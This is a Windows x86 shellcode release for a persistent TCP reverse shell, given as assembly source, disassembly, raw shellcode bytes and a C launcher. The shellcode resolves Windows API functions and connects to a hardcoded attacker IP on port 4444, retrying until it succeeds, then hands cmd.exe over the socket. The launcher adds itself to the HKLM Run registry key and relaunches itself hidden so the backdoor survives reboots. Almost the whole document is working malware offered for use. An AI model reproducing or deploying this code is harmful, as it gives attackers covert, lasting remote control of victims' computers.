/* # Title : Windows x86 persistent reverse shell tcp # Author : Roziul Hasan Khan Shifat # Date : 04-09-2016 # Tested on : Windows 7 x86 */ /* Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;PEB mov eax,[eax+0xc] ;PEB->Ldr mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList lodsd xchg esi,eax lodsd mov ecx,[eax+0x10] ;kernel32.dll mov ebx,[ecx+0x3c] ;DOS->elf_anew add ebx,ecx ;PE HEADER mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress add ebx,ecx ;IMAGE_EXPORT_DIRECTORY mov esi,[ebx+0x20] ;AddressOfNames add esi,ecx xor edx,edx g: inc edx lodsd add eax,ecx cmp dword [eax],'GetP' jne g cmp dword [eax+4],'rocA' jne g cmp dword [eax+8],'ddre' jne g mov esi,[ebx+0x1c] ;AddressOfFunctions add esi,ecx mov edx,[esi+edx*4] add edx,ecx ;GetProcAddress() xor eax,eax push eax sub esp,24 lea esi,[esp] mov [esi],dword edx ;GetProcAddress() at offset 0 mov edi,ecx ;kernel32.dll ;------------------------------ ;finding address of CreateProcessA() push 0x42424173 mov [esp+2],word ax push 0x7365636f push 0x72506574 push 0x61657243 lea eax,[esp] push eax push ecx call edx ;---------------------------- add esp,16 mov [esi+4],dword eax ;CreateProcessA() at offset 4 ;----------------------------- ;finding address of ExitProcess() xor ecx,ecx push 0x41737365 mov [esp+3],byte cl push 0x636f7250 push 0x74697845 lea ecx,[esp] push ecx push edi call dword [esi] add esp,12 mov [esi+8],dword eax ;ExitProcess() at offset 8 ;----------------------------------------------------- ;loading ws2_32.dll xor ecx,ecx push ecx push 0x41797261 push 0x7262694c push 0x64616f4c lea ecx,[esp] push ecx push edi call dword [esi] add esp,12 xor ecx,ecx push 0x41416c6c mov [esp+2],word cx push 0x642e3233 push 0x5f327377 lea ecx,[esp] push ecx call eax add esp,8 mov edi,eax ;ws2_32.dll ;----------------------------------- ;finding address of WSAStartup() xor ecx,ecx push 0x41417075 mov [esp+2],word cx push 0x74726174 push 0x53415357 lea ecx,[esp] push ecx push eax call dword [esi] add esp,12 mov [esi+12],dword eax ;WSAStartup() at offset 12 ;------------------------------------------ ;finding address of WSASocketA() xor ecx,ecx push 0x42424174 mov [esp+2],word cx push 0x656b636f push 0x53415357 lea ecx,[esp] push ecx push edi call dword [esi] add esp,12 mov [esi+16],dword eax ;WSASocketA() at offset 16 ;----------------------------- ;finding address of WSAConnect() xor ecx,ecx push 0x41417463 mov [esp+2],word cx push 0x656e6e6f push 0x43415357 lea ecx,[esp] push ecx push edi call dword [esi] add esp,12 mov [esi+20],dword eax ;WSAConnect() at offset 20 ;------------------------------------------------ ;WSAStartup(514, &WSADATA) xor ecx,ecx push ecx mov cx,400 sub esp,ecx lea ecx,[esp] xor ebx,ebx mov bx,514 push ecx push ebx call dword [esi+12] ;------------------------------- ;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL) xor ecx,ecx push ecx push ecx push ecx mov cl,6 push ecx sub ecx,5 push ecx inc ecx push ecx call dword [esi+16] xchg edi,eax ;SOCKET ;-------------------------------------------------- ;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL) xor ecx,ecx push ecx push ecx push ecx push ecx mov [esp],byte 2 mov [esp+2],word 0x5c11 ;port 4444 (change it if U want) mov [esp+4],dword 0x81e8a8c0 ;Change it connect: xor ecx,ecx lea ebx,[esp] push ecx push ecx push ecx push ecx mov cl,16 push ecx push ebx push edi call dword [esi+20] xor ecx,ecx cmp eax,ecx jnz connect ;---------------------------------------------- xor ecx,ecx sub esp,16 lea edx,[esp] ;PROCESS_INFORMATION push edi push edi push edi push ecx push word cx push word cx mov cl,255 inc ecx push ecx xor ecx,ecx push ecx push ecx push ecx push ecx push ecx push ecx push ecx push ecx push ecx push ecx mov cl,68 push ecx lea ecx,[esp] xor edx,edx push 0x41657865 mov [esp+3],byte dl push 0x2e646d63 lea edx,[esp] ;----------------------------- ;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info) push ebx push ecx xor ecx,ecx push ecx push ecx push ecx inc ecx push ecx xor ecx,ecx push ecx push ecx push edx push ecx call dword [esi+4] push eax call dword [esi+8] */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 8b 59 3c mov 0x3c(%ecx),%ebx 15: 01 cb add %ecx,%ebx 17: 8b 5b 78 mov 0x78(%ebx),%ebx 1a: 01 cb add %ecx,%ebx 1c: 8b 73 20 mov 0x20(%ebx),%esi 1f: 01 ce add %ecx,%esi 21: 31 d2 xor %edx,%edx 00000023 : 23: 42 inc %edx 24: ad lods %ds:(%esi),%eax 25: 01 c8 add %ecx,%eax 27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2d: 75 f4 jne 23 2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 36: 75 eb jne 23 38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 3f: 75 e2 jne 23 41: 8b 73 1c mov 0x1c(%ebx),%esi 44: 01 ce add %ecx,%esi 46: 8b 14 96 mov (%esi,%edx,4),%edx 49: 01 ca add %ecx,%edx 4b: 31 c0 xor %eax,%eax 4d: 50 push %eax 4e: 83 ec 18 sub $0x18,%esp 51: 8d 34 24 lea (%esp),%esi 54: 89 16 mov %edx,(%esi) 56: 89 cf mov %ecx,%edi 58: 68 73 41 42 42 push $0x42424173 5d: 66 89 44 24 02 mov %ax,0x2(%esp) 62: 68 6f 63 65 73 push $0x7365636f 67: 68 74 65 50 72 push $0x72506574 6c: 68 43 72 65 61 push $0x61657243 71: 8d 04 24 lea (%esp),%eax 74: 50 push %eax 75: 51 push %ecx 76: ff d2 call *%edx 78: 83 c4 10 add $0x10,%esp 7b: 89 46 04 mov %eax,0x4(%esi) 7e: 31 c9 xor %ecx,%ecx 80: 68 65 73 73 41 push $0x41737365 85: 88 4c 24 03 mov %cl,0x3(%esp) 89: 68 50 72 6f 63 push $0x636f7250 8e: 68 45 78 69 74 push $0x74697845 93: 8d 0c 24 lea (%esp),%ecx 96: 51 push %ecx 97: 57 push %edi 98: ff 16 call *(%esi) 9a: 83 c4 0c add $0xc,%esp 9d: 89 46 08 mov %eax,0x8(%esi) a0: 31 c9 xor %ecx,%ecx a2: 51 push %ecx a3: 68 61 72 79 41 push $0x41797261 a8: 68 4c 69 62 72 push $0x7262694c ad: 68 4c 6f 61 64 push $0x64616f4c b2: 8d 0c 24 lea (%esp),%ecx b5: 51 push %ecx b6: 57 push %edi b7: ff 16 call *(%esi) b9: 83 c4 0c add $0xc,%esp bc: 31 c9 xor %ecx,%ecx be: 68 6c 6c 41 41 push $0x41416c6c c3: 66 89 4c 24 02 mov %cx,0x2(%esp) c8: 68 33 32 2e 64 push $0x642e3233 cd: 68 77 73 32 5f push $0x5f327377 d2: 8d 0c 24 lea (%esp),%ecx d5: 51 push %ecx d6: ff d0 call *%eax d8: 83 c4 08 add $0x8,%esp db: 89 c7 mov %eax,%edi dd: 31 c9 xor %ecx,%ecx df: 68 75 70 41 41 push $0x41417075 e4: 66 89 4c 24 02 mov %cx,0x2(%esp) e9: 68 74 61 72 74 push $0x74726174 ee: 68 57 53 41 53 push $0x53415357 f3: 8d 0c 24 lea (%esp),%ecx f6: 51 push %ecx f7: 50 push %eax f8: ff 16 call *(%esi) fa: 83 c4 0c add $0xc,%esp fd: 89 46 0c mov %eax,0xc(%esi) 100: 31 c9 xor %ecx,%ecx 102: 68 74 41 42 42 push $0x42424174 107: 66 89 4c 24 02 mov %cx,0x2(%esp) 10c: 68 6f 63 6b 65 push $0x656b636f 111: 68 57 53 41 53 push $0x53415357 116: 8d 0c 24 lea (%esp),%ecx 119: 51 push %ecx 11a: 57 push %edi 11b: ff 16 call *(%esi) 11d: 83 c4 0c add $0xc,%esp 120: 89 46 10 mov %eax,0x10(%esi) 123: 31 c9 xor %ecx,%ecx 125: 68 63 74 41 41 push $0x41417463 12a: 66 89 4c 24 02 mov %cx,0x2(%esp) 12f: 68 6f 6e 6e 65 push $0x656e6e6f 134: 68 57 53 41 43 push $0x43415357 139: 8d 0c 24 lea (%esp),%ecx 13c: 51 push %ecx 13d: 57 push %edi 13e: ff 16 call *(%esi) 140: 83 c4 0c add $0xc,%esp 143: 89 46 14 mov %eax,0x14(%esi) 146: 31 c9 xor %ecx,%ecx 148: 51 push %ecx 149: 66 b9 90 01 mov $0x190,%cx 14d: 29 cc sub %ecx,%esp 14f: 8d 0c 24 lea (%esp),%ecx 152: 31 db xor %ebx,%ebx 154: 66 bb 02 02 mov $0x202,%bx 158: 51 push %ecx 159: 53 push %ebx 15a: ff 56 0c call *0xc(%esi) 15d: 31 c9 xor %ecx,%ecx 15f: 51 push %ecx 160: 51 push %ecx 161: 51 push %ecx 162: b1 06 mov $0x6,%cl 164: 51 push %ecx 165: 83 e9 05 sub $0x5,%ecx 168: 51 push %ecx 169: 41 inc %ecx 16a: 51 push %ecx 16b: ff 56 10 call *0x10(%esi) 16e: 97 xchg %eax,%edi 16f: 31 c9 xor %ecx,%ecx 171: 51 push %ecx 172: 51 push %ecx 173: 51 push %ecx 174: 51 push %ecx 175: c6 04 24 02 movb $0x2,(%esp) 179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp) 180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp) 187: 81 00000188 : 188: 31 c9 xor %ecx,%ecx 18a: 8d 1c 24 lea (%esp),%ebx 18d: 51 push %ecx 18e: 51 push %ecx 18f: 51 push %ecx 190: 51 push %ecx 191: b1 10 mov $0x10,%cl 193: 51 push %ecx 194: 53 push %ebx 195: 57 push %edi 196: ff 56 14 call *0x14(%esi) 199: 31 c9 xor %ecx,%ecx 19b: 39 c8 cmp %ecx,%eax 19d: 75 e9 jne 188 19f: 31 c9 xor %ecx,%ecx 1a1: 83 ec 10 sub $0x10,%esp 1a4: 8d 14 24 lea (%esp),%edx 1a7: 57 push %edi 1a8: 57 push %edi 1a9: 57 push %edi 1aa: 51 push %ecx 1ab: 66 51 push %cx 1ad: 66 51 push %cx 1af: b1 ff mov $0xff,%cl 1b1: 41 inc %ecx 1b2: 51 push %ecx 1b3: 31 c9 xor %ecx,%ecx 1b5: 51 push %ecx 1b6: 51 push %ecx 1b7: 51 push %ecx 1b8: 51 push %ecx 1b9: 51 push %ecx 1ba: 51 push %ecx 1bb: 51 push %ecx 1bc: 51 push %ecx 1bd: 51 push %ecx 1be: 51 push %ecx 1bf: b1 44 mov $0x44,%cl 1c1: 51 push %ecx 1c2: 8d 0c 24 lea (%esp),%ecx 1c5: 31 d2 xor %edx,%edx 1c7: 68 65 78 65 41 push $0x41657865 1cc: 88 54 24 03 mov %dl,0x3(%esp) 1d0: 68 63 6d 64 2e push $0x2e646d63 1d5: 8d 14 24 lea (%esp),%edx 1d8: 53 push %ebx 1d9: 51 push %ecx 1da: 31 c9 xor %ecx,%ecx 1dc: 51 push %ecx 1dd: 51 push %ecx 1de: 51 push %ecx 1df: 41 inc %ecx 1e0: 51 push %ecx 1e1: 31 c9 xor %ecx,%ecx 1e3: 51 push %ecx 1e4: 51 push %ecx 1e5: 52 push %edx 1e6: 51 push %ecx 1e7: ff 56 04 call *0x4(%esi) 1ea: 50 push %eax 1eb: ff 56 08 call *0x8(%esi) */ #include #include #include char shellcode[]=\ "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08"; int main(int li,char *a[]) { char info[200]; DWORD l; HKEY i; RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i); int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l); if(i!=0) { RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0])); RegCloseKey(i); } else RegCloseKey(i); int mode; if(li==1) mode=1; else mode=atoi(a[1]); switch(mode) { case 78: (* (int(*)())shellcode )(); break; case 1: default: ShellExecute(NULL,NULL,a[0],"78",NULL,0); break; } return 0; }